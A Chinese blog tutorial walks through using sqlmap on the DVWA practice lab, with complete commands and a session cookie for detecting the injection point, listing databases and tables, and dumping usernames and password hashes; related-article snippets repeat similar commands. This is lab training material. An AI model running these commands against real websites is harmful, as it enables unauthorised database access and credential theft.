sqlmap工具的使用(DVWA)

最新推荐文章于 2024-07-24 01:05:02 发布
最新推荐文章于 2024-07-24 01:05:02 发布
阅读量1.3k 收藏 13
点赞数 3
分类专栏: 工具使用 dvwa 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52923241/article/details/115588173
版权
本文详细介绍了SQL注入工具SQLMap的使用,包括下载安装、基本参数、数据库探测、表和字段枚举等步骤。通过实例演示了在DVWA靶场中进行SQL注入的过程,展示了如何利用SQLMap获取数据库信息、表名、字段及数据内容。同时,强调了在进行SQL注入测试时,如需登录则需提供Cookie信息。
摘要由CSDN通过智能技术生成

sqlmap详细内容建议点击下方链接

sqlmap简介·下载及安装·sql使用参数详解·sqlmap进行sql注入常规使用步骤·常规细节知识点

使用sqlmap进行SQL注入的基本步骤

  • 查看sqlmap相关参数,命令格式为:sqlmap -h
  • 找到一个可利用的网址,判断网站数据库类型,命令格式为:sqlmap -u
  • 确定数据库类型为mysql后,查看存在的数据库,命令格式为:sqlmap -u 目标网址–dbs
  • 查看数据库中存在的表,命令格式为:sqlmap -u 目标网址–tables -D 数据库名
  • 获取表中的字段,命令格式为:sqlmap -u 目标网址– columns -T 表名 -D 数据库名
  • 猜解出字段,查看表里的存储内容,命令格式为:sqlmap -u 目标网址– dump -C 字段名称 -T 表名 -D 数据库名

在这之前有几个小知识点

  • sqlmap需要我们输入参数,其中最重要的参数是SQL注入的目标地址。首先要判断测试的目标地址是否需要登录,如果需要登录,则将登陆的Cookie作为参数传递给sqlmap。
    • python sqlmap.py -u “目标地址” --cookie=“cookie值” --batch
  • –batch用来指明自动化操作,否则每一个步骤都需要确认;
  • –current-bd查看当前数据库名称
  • -D DB 指定要枚举的 DBMS 数据库
  • -T TBL 指定要枚举的 DBMS 数据表
  • -C COL 指定要枚举的 DBMS 数据列
  • -X EXCLUDECOL 指定要排除的 DBMS 数据列
  • -U USER 指定枚举的 DBMS 用户

DVWA 之SQL Injection

  • 先判断测试的目标网址是否需要登录,如果需要登录,将登录的cookie传给sqlmap

    • 因为DVWA需要登录,所以需要将登陆的Cookie作为参数传递给sqlmap
    • 输入user ID为1,然后用burpsuite进行拦截,得到cookie值
      在这里插入图片描述
    • 启动python sqlmap.py
    • 输入python sqlmap.py -u “http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=hrv6mq4hkpul7c5iim0q8ar3b3” --batch
      在这里插入图片描述
      可以看到id处存在SQL注入

  • 查看数据库信息
    输入python sqlmap.py -u “http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=hrv6mq4hkpul7c5iim0q8ar3b3” --batch --dbs
    在这里插入图片描述

  • 查看当前数据库名称
    输入python sqlmap.py -u “http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=hrv6mq4hkpul7c5iim0q8ar3b3” --batch --current -db
    在这里插入图片描述
    可以看到当前数据库名称为dvwa

  • 查看数据库中的所有表
    输入python sqlmap.py -u “http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=hrv6mq4hkpul7c5iim0q8ar3b3” --batch -D dvwa --tables
    在这里插入图片描述

  • 查看dvwa数据库中users表中的字段
    输入python sqlmap.py -u “http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=hrv6mq4hkpul7c5iim0q8ar3b3” --batch -D dvwa -T users --columns
    在这里插入图片描述

  • 将users表中的password和user字段的所有信息测试出来
    输入python sqlmap.py -u “http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=hrv6mq4hkpul7c5iim0q8ar3b3” --batch -D dvwa -T users -C “user,password” --dump
    在这里插入图片描述
    得到用户名与密码

吃_早餐
关注
专栏目录
DVWA中学习使用sqlmap
不想当脚本小子的脚本小子
01-16 357
1.-u URL, --url=URL 目标URL (e.g."http://www.site.com/vuln.php?id=1") --batch --cookie:加上cookie(可以利用火狐插件cookie manager获取) sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --batch --cookie="security=low;PHPSESSID=" --d...
DVWA-SQL注入(sqlmap安装和使用
weixin_53256941的博客
07-12 1015
一.Python环境安装 链接: https://pan.baidu.com/s/1ZbR6LoKcSvqnF82UZvkesg?pwd=e79b 提取码: e79b 双击安装包进行安装配置环境变量 我的电脑,找到属性点击高级系统设置 出现"系统属性",点击环境变量 在下面的"系统变量"里面找到Path变量点击编辑,(没有的话点击新建)在变量值末尾,填上python安装路径 win+R+cmd打开命令窗口输入python出现此页面表示安装成功 二.Sqlmap安装 链接:https://pan.baidu.
Sqlmap
mumuzi2的博客
02-25 403
下载地址: http://sqlmap.org/ 需要环境: python 使用方法:
[DVWA靶场实战]-SQL注入攻击(命令注入+SQL回显注入+sqlmap工具实现自动化注入)详细教程
最新发布
weixin_60838266的博客
07-24 1266
利用Kali Linux和burpsuite对DVWA靶场的Command Injection模块和SQL Injection模块进行sql注入攻击详细教程,包括使用工具sqlmap进行自动化注入攻击。
SQLMap 注入 DVWA实战
Cobra的博客
12-16 3043
一、low级别 1、进入dvwa界面输入1,点击Submit,得到链接 http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit# 2、我们用sqlmap进行爆破 sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#" 我们可以看到需要跳转到login的页面,所以,认为这里.
sqlmap dvwa SQL Injection使用小记
无心插柳
10-29 9552
sqlmap初步使用,测试环境为dvwa
一起学安全测试——用sqlmapdvwa实现SQL注入测试
热门推荐
灰蓝
03-29 1万+
sqlmap是一款进行SQL注入的工具,非常简单好用。我们在dvwa上试着用sqlmap实现注入,拿到数据库的信息。搭建dvwa环境并启动。 windows上需要搭建Python环境,下载sqlmap包并解压。kali linux自带(之后演示在kali上)。 设置dvwa级别为low(medium,high都可以,不要设成impossible就行) 打开dvwaSQL Injection,打开浏
SQLMapSQLMap DVWA实战
Black coder
10-26 662
SQLMap 注入 DVWA实战
使用Sqlmapdvwa进行sql注入测试(初级阶段)
fanxindong0620的博客
11-07 3420
0.测试准备 1)打开Kali虚拟机终端; 2)打开靶机OWASP,并通过浏览器,输入IP地址进入dvwa的主页,然后选择SQL injection进入SQL注入的测试页面 1.获取DVWA的url和cookie 在输入框中输入1,显示有内容,此时利用此URL进行SQL注入。 输入document.cookie获取页面的cookie。去除remem_token字段的内容,用于下文的sql注入终...
sqlmapdvwa
06-14
当你使用SQLMapDVWA进行渗透测试时,你可以执行以下几个步骤: 1. **下载并安装**:首先,你需要从SQLMap的官方GitHub仓库下载最新版本,并按照指示安装在你的测试环境中。 2. **目标设置**:连接到DVWA的服务器...
Sqlmap 注入DVWA[low]
R4bbit
04-11 1083
0.dvwa要登陆才能访问到带有sql注入的页面,所以我们需要带有cookie注入 参数:--cookie="you cookie" 伪命令: sqlmap -u "http://www.sxxxx.com/1.php?id=111" --cookie="You cookie" 使用演示: 因为命令太长了,不方便看,我将参数以行间隔,真正使用的时候是不需要用行间隔的 sqlmap --url...
【渗透测试】|sqlmap工具注入-基于dvwasql injection
yangdan_jiayou的博客
03-27 693
这个检测结果表明系统对联合查询的处理方式存在漏洞,可以通过联合查询来获取额外的信息或执行其他操作。这个检测结果表明系统对错误消息的处理方式存在漏洞,可以通过错误消息来推断数据库的结构或内容,从而进行注入攻击。这个payload试图通过在查询中嵌入一个时间延迟函数来验证注入点的存在,如果系统在执行这个查询时发生了延迟,那么说明注入点存在,攻击者可以进一步利用这个注入点执行其他操作。这个payload尝试通过在查询中嵌入一个错误,然后通过错误消息中的内容来获取敏感信息或执行其他恶意操作。
漏洞防范:搭建漏洞靶场DVWA,DVWASQL注入漏洞,利用sqlmap把复杂的程序自动化
weixin_52371314的博客
10-12 1947
sql注入漏洞
DVWA靶场 -如何使用sqlmap 工具get注入
xiaojiadong2019的博客
10-19 502
SQL注入是将Web页面的原URL、表单域或数据包输入的参数,修改拼接成SQL语句,传递给Web服务器,进而传给数据库服务器以执行数据库命令。如Web应用程序的开发人员对用户所输入的数据或cookie等内容不进行过滤或验证(即存在注入点)就直接传输给数据库,就可能导致拼接的SQL被执行,获取对数据库的信息以及提权,发生SQL注入攻击。注入点初步测试,输入框输入单引号'出现报错,可以看出该输入框存在注入点,且数据库是MySQL数据库。2、通过注入点,尝试获取数据库相关基本信息。2、使用Sqlmap工具测试。
DVWA——使用sqlmap工具post注入
@一只躺平的猪@的博客
07-09 4313
使用phpstudy搭建的DVWA靶场-暴力破解(low级别) sqlmap 可以看到密码解密为root 也可以用在线的md5对密文进行解密 https://www.cmd5.com/ 本章介绍了sqlmap关于post注入的使用步骤以及攻击的相关语句。
搭建DVWA测试环境和SQL注入之SQLmap入门
xueyunzi1的博客
08-03 562
开发十年,就只剩下这套Java开发体系了 >>>    ...
sqlmap自动化漏洞利用(DVWA初、中、高)
qq_42620328的博客
10-14 7475
sqlmap自动化漏洞利用(DVWA
DVWASQL注入漏洞与SQLmap
leaf_lucky的博客
01-24 766
对于以上两个语句,1=1会正常输出,而1=2 错误输出,可以说明SQL语句生效,SQL语句存在漏洞。用户输入SQL语句,执行了MySQL内置函数user(),database()而对于以下语句,可以发现没有语句,SQL语句变化,1!= 2,不能得到输出。输入上面的语句有正常输出,对于“#”的作用是注释后续SQL语句。点击第一个,找到cookie,复制下来,即是以下语句。上面语句为原本的SQL语句,下面语句为过滤后的语句。对于上面三句语句,依次进行判断,可以得到。输入1' order by 1#得到。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

吃_早餐

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值